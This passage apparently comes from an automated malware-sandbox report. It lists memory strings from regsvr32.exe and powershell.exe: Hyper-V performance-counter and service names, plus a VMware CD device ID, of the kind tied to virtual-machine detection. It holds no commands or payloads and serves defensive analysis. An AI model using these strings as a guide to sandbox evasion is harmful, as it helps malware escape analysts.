Source: regsvr32.exe, 00000008.00000003.1802052757.00000000026E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HL
Source: powershell.exe, 00000011.00000002.2098231476.000001C80E6A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
Source: regsvr32.exe, 00000010.00000003.2331064424.000000000123C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2326216192.0000000003A03000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000002.2333007615.0000000001259000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2032234436.0000000001245000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2019625539.0000000003909000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Logical Processor.mui"
Source: regsvr32.exe, 00000010.00000003.2331064424.000000000123C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2326216192.0000000003A03000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000002.2333007615.0000000001259000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2032234436.0000000001245000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2019625539.0000000003909000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid Partition
Source: regsvr32.exe, 00000008.00000003.1808764425.0000000002770000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1807485390.000000000275A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1801667290.000000000275C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1807589836.0000000002768000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id
Source: regsvr32.exe, 00000008.00000003.1820951709.000000000335A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.000000000335B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092606345.000000000291D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092953875.0000000002946000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2017378313.0000000002DD1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2332362864.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000388B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000002.2332847185.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2326216192.0000000003985000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2019625539.0000000003885000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Partition
Source: regsvr32.exe, 00000008.00000003.1807203427.0000000002768000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ansitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost5032Debug Register Accesses/sec5034Debug Register Accesses Cost5036Page Fault Intercepts/sec5038Page Fault Intercepts Cost5040NMI Interrupts/sec5042NMI Interrupts Cost5044Guest Page Table Maps/sec5046Large Page TLB Fills/sec5048Small Page TLB Fills/sec5050Reflected Guest Page Faults/sec5052APIC MMIO Accesses/sec5054IO Intercept Messages/s
Source: regsvr32.exe, 00000008.00000003.1827269444.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1820951709.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2096853913.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2331064424.000000000123C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2326216192.0000000003A03000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000002.2333007615.0000000001259000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000390A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2032234436.0000000001245000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2019625539.0000000003909000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Service
Source: regsvr32.exe, 00000008.00000003.1808144317.000000000282D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1808683293.000000000282D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1808165478.000000000282D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1808314026.000000000282D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1808555082.000000000282D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1800365313.0000000002833000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1808533714.000000000282D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1808630037.000000000282D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1800161121.0000000002833000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1800519413.0000000002833000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1807953878.000000000282D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp In
Source: regsvr32.exe, 00000008.00000003.1800714954.0000000002833000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1809353860.0000000002835000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1801477539.0000000002835000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1808800604.0000000002851000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1809279203.0000000002851000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818I
Source: regsvr32.exe, 00000010.00000003.2331064424.000000000123C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2326216192.0000000003A03000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000002.2333007615.0000000001259000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2032234436.0000000001245000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2019625539.0000000003909000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Service
Source: regsvr32.exe, 00000008.00000003.2088789519.000000000290A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2320947816.0000000002DF9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWuv
Source: regsvr32.exe, 00000008.00000003.1820951709.000000000335A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.000000000335B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2017378313.0000000002DD1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000388B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus Pipes
Source: regsvr32.exe, 00000008.00000003.1827269444.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1820951709.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2096853913.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000390A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sWDHyper-V Hypervisor Root Partitionui
Source: regsvr32.exe, 00000008.00000003.1827269444.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092606345.000000000291D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092953875.0000000002946000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1820951709.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2096853913.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2332362864.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000002.2332847185.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000390A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2326216192.0000000003985000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2019625539.0000000003885000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processor
Source: regsvr32.exe, 00000008.00000003.1827269444.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1820951709.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2096853913.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000390A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid Partition*=
Source: regsvr32.exe, 00000010.00000003.1993680972.0000000002CD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ot Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost5032Debug Register Accesses/sec5034Debug Register Accesses Cost5036Page Fault Intercepts/sec5038Page Fault Intercepts Cost5040NMI Interrupts/sec5042NMI Interrupts Cost5044Guest Page Table Maps/sec5046Large Page TLB Fills/sec5048Small Page TLB Fills/sec5050Reflected Guest Page Faults/sec5052APIC MMIO Accesses/sec5054IO Intercept Messages/sec5056Memory Intercept Messages/sec5058APIC EOI Accesses/sec5060Other Messages/sec5062Page Table Allocations/sec5064Logical Processor Migrations/sec5066Address Space Evictions/sec5
Source: regsvr32.exe, 00000010.00000003.2020259374.0000000002E3F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: regsvr32.exe, 00000008.00000003.2092606345.000000000291D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092953875.0000000002946000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2326216192.0000000003985000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000002.2332847185.00000000011DB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2019625539.0000000003885000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2Hyper-V VM Vid Partitionmun5
Source: regsvr32.exe, 00000008.00000003.1801142128.000000000270C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1793582257.000000000270C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Tra
Source: regsvr32.exe, 00000008.00000003.2092606345.000000000291D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092953875.0000000002946000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2332362864.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000002.2332847185.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2326216192.0000000003985000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2019625539.0000000003885000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V HypervisorH
Source: regsvr32.exe, 00000008.00000003.1801724260.0000000002732000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1807568919.0000000002732000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter
Source: regsvr32.exe, 00000008.00000003.1827269444.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1820951709.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2096853913.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2331064424.000000000123C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2326216192.0000000003A03000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000002.2333007615.0000000001259000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000390A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2032234436.0000000001245000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2019625539.0000000003909000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V wwqkrpglnloojsk Bus
Source: regsvr32.exe, 00000008.00000003.1801309074.0000000000DF1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost5032Debug Register Accesses/sec5034Debug Register Accesses Cost5036Page Fault Intercepts/sec5038Page Fault Intercepts Cost5040NMI Interrupts/sec5042NMI Interrupts Cost5044Guest Page Table Maps/sec5046Large Page TLB Fills/sec5048Small Page TLB Fills/sec5050Reflected Guest Page Faults/sec5052APIC MMIO Accesses/sec5054IO Intercept Messages/sec5056Memory Intercept Messages/sec5058APIC EOI Accesses/sec5060Other Messages/sec5062Page Table Allocations/sec5064Logical Processor Migrations/sec5066Address Space Evictions/sec5068Address Space Switches/sec5070Address Domain Flushes/sec5072Address Space Flushes/sec5074Global GVA Range Flushes/sec5076Local Flushed GVA Ranges/sec5078Page Table Evictions/sec5080Page Table Reclamations/sec5082Page Table Re
